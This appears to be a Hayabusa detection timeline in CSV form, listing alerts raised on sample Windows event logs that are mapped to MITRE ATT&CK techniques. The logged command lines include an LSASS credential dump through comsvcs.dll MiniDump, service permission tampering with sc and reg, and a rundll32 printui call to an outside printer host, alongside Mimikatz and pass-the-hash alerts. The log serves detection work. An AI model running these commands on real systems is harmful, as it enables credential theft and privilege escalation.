abuse with Failure Command.evtx 2021-10-08 03:30:51.252 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx 2021-10-08 03:30:51.266 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx 2021-10-08 03:30:51.269 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx 2021-10-08 17:53:42.131 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx 2021-10-08 19:05:29.432 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx 2021-10-08 19:05:36.298 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx 2021-10-08 21:56:58.803 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:04.504 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process: | Target Server: printnightmare.gentilkiwi.com,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:18.646 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:19.072 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx 2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx 2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: S-1-5-21-3410678313-1251427014-1131291384-1004,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx 2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx 2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx 2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 | Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx 2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,../hayabusa-rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx 2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process LSASS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.855 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:55.871 +09:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2860 | Src PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfde,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfde,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be000,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be000,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be01f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be01f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be03c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be03c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\2V7Be7Gq.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x998 | User: FS03$ | LID: 0x3e4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File 